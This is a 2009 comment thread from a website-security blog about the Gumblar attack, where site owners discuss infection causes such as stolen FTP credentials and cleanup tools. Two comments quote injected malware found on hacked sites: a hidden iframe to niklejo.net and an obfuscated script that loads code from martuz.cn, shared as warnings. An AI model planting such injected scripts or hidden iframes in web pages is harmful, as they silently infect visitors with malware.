Comments on: A Few More Facts About the Gumblar Attack From SophosLab and ScanSafe. http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/ Website insecurity by example Sun, 05 Feb 2012 10:06:25 +0000 http://wordpress.org/?v=2.9.1 hourly 1 By: Wayne http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1999 Wayne Fri, 07 Aug 2009 11:12:47 +0000 http://blog.unmaskparasites.com/?p=199#comment-1999 I cannot recommend http://www.axxis.gr/index.php?option=com_content&view=article&id=35 Enough. Chris saved me from hours and hours of work with his Antivirus program to scan website directories! Again Thanks Chris!!! I cannot recommend

http://www.axxis.gr/index.php?option=com_content&view=article&id=35

Enough.

Chris saved me from hours and hours of work with his Antivirus program to scan website directories!

Again Thanks Chris!!!

]]> By: Chris http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1426 Chris Fri, 12 Jun 2009 18:38:59 +0000 http://blog.unmaskparasites.com/?p=199#comment-1426 @Ali, we've already developed an application that scans for and removes pre-defined and/or any given malicious code from your files. currently it scans for 22 suspicious codes (possible threats - no action taken), and 25 virus definitions (actual viruses - file gets cleaned). and you have the option to add your own in both lists, so you will always stay up-to-date. please check it out here: http://www.axxis.gr/index.php?option=com_content&view=article&id=35 @Ali,

we’ve already developed an application that scans for and removes pre-defined and/or any given malicious code from your files.

currently it scans for 22 suspicious codes (possible threats – no action taken), and 25 virus definitions (actual viruses – file gets cleaned). and you have the option to add your own in both lists, so you will always stay up-to-date.

please check it out here:
http://www.axxis.gr/index.php?option=com_content&view=article&id=35

]]> By: Internet Evolution - Gideon J. Lenkey - Gumblar: Botnet With a Twist http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1421 Internet Evolution - Gideon J. Lenkey - Gumblar: Botnet With a Twist Fri, 12 Jun 2009 02:47:44 +0000 http://blog.unmaskparasites.com/?p=199#comment-1421 [...] Digg   Del.icio.us   Reddit   Email This By now you've probably heard about Gumblar, the cheeky little nastyware that uses injected Javascript to load complementary malware from a Web [...] [...] Digg   Del.icio.us   Reddit   Email This By now you’ve probably heard about Gumblar, the cheeky little nastyware that uses injected Javascript to load complementary malware from a Web [...]

]]> By: Ali http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1227 Ali Mon, 18 May 2009 23:16:49 +0000 http://blog.unmaskparasites.com/?p=199#comment-1227 oops, this iframe that is: iframe src="http ://niklejo .net/?click=2A909B" width=1 height=1 style="visibility:hidden;position:absolute"> oops, this iframe that is:
iframe src=”http ://niklejo .net/?click=2A909B” width=1 height=1 style=”visibility:hidden;position:absolute”>

]]> By: Ali http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1226 Ali Mon, 18 May 2009 23:16:04 +0000 http://blog.unmaskparasites.com/?p=199#comment-1226 Speaking of the new variant, I saw this iFrame injected all over my pages as well: Speaking of the new variant, I saw this iFrame injected all over my pages as well:

]]> By: Denis http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1215 Denis Sun, 17 May 2009 21:03:36 +0000 http://blog.unmaskparasites.com/?p=199#comment-1215 Thanks, I noticed the change in the script too. I'm going to blog about it on Monday. Thanks,

I noticed the change in the script too. I’m going to blog about it on Monday.

]]> By: G`nome http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1213 G`nome Sun, 17 May 2009 17:08:18 +0000 http://blog.unmaskparasites.com/?p=199#comment-1213 Hi I just want warn to everyone regarding "martuz.cn". Gumblar.cn already removed A record from their DNS, it meant gumblar no longer resolved at this time. However, malicious attacker already replaced "martuz.cn" instead of gumblar, almost compromised site has been re-injected malicious code like this... var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf ("Chrome")0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))) {zrvzts="A";eval("if(window."+a+") j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("{script src=//mar"+"tuz.cn/vid/?id="+j+"}{\/script}");} It seems small changed that they want reject "Chrome". I found several site that compromised but I can't do anything because of my English is too poorly. Symantec already blocked due to Trojan Horse. https://safeweb.norton.com/report/show?name=martuz.cn Also these IPs are blacklisted by SBL. http://www.spamhaus.org/ I wish attention earlier to stop spread this "martuz pandemic". Hi

I just want warn to everyone regarding “martuz.cn”.

Gumblar.cn already removed A record from their DNS, it meant gumblar no longer resolved at this time.
However, malicious attacker already replaced “martuz.cn” instead of gumblar, almost compromised site has been re-injected malicious code like this…

var a=”ScriptEngine”,b=”Version()+”,j=”",u=navigator.userAgent;if((u.indexOf
(“Chrome”)0)&&(u.indexOf(“NT 6″)<0)&&(document.cookie.indexOf(“miek=1″)<0)&&(typeof(zrvzts)!=typeof(“A”)))
{zrvzts=”A”;eval(“if(window.”+a+”) j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);document.write(“{script
src=//mar”+”tuz.cn/vid/?id=”+j+”}{\/script}”);}

It seems small changed that they want reject “Chrome”. I found several site that compromised but I can’t do anything because of my English is too poorly.

Symantec already blocked due to Trojan Horse.
https://safeweb.norton.com/report/show?name=martuz.cn

Also these IPs are blacklisted by SBL.
http://www.spamhaus.org/

I wish attention earlier to stop spread this “martuz pandemic”.

]]> By: Ali http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1211 Ali Sun, 17 May 2009 11:12:01 +0000 http://blog.unmaskparasites.com/?p=199#comment-1211 Hey Denis, I read the articles and I know what you're saying in terms of hacked FTP credentials It's odd though, i have several sites on one host and only one was infected even though I had passwords for several others in my filezilla profile. In the end, I was forced to take down my site. because I had 539 infected files. I'm writing an app to go through the files and clean them. I haven't seen anything like that out there as yet. Hey Denis,

I read the articles and I know what you’re saying in terms of hacked FTP credentials

It’s odd though, i have several sites on one host and only one was infected even though I had passwords for several others in my filezilla profile.

In the end, I was forced to take down my site. because I had 539 infected files.

I’m writing an app to go through the files and clean them. I haven’t seen anything like that out there as yet.

]]> By: Denis http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1210 Denis Sun, 17 May 2009 10:51:05 +0000 http://blog.unmaskparasites.com/?p=199#comment-1210 You should read the referenced articles carefully. They all say that compromised FTP credentials are to blame. You should read the referenced articles carefully. They all say that compromised FTP credentials are to blame.

]]> By: Ali http://blog.unmaskparasites.com/2009/05/15/a-few-more-facts-about-the-gumblar-attack-from-sophoslab-and-scansafe/comment-page-1/#comment-1201 Ali Sun, 17 May 2009 01:16:12 +0000 http://blog.unmaskparasites.com/?p=199#comment-1201 We had gunblar affect our site as well. I'm starting to wonder if the issue is not a vulnerability in Joomla or some joomla component. Has anyone found the root cause of how their site got infected in the first place? <em>Edit by Denis: I've removed your site from you signature since it is infected with both Gumblar and the <a href="http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/" rel="nofollow">malicious iframe</a>. <a href="http://www.UnmaskParasites.com/security-report/?page=bcproject.info" rel="nofollow">Unmask Parasites report</a>.</em> We had gunblar affect our site as well. I’m starting to wonder if the issue is not a vulnerability in Joomla or some joomla component. Has anyone found the root cause of how their site got infected in the first place?

Edit by Denis: I’ve removed your site from you signature since it is infected with both Gumblar and the malicious iframe.
Unmask Parasites report.

]]>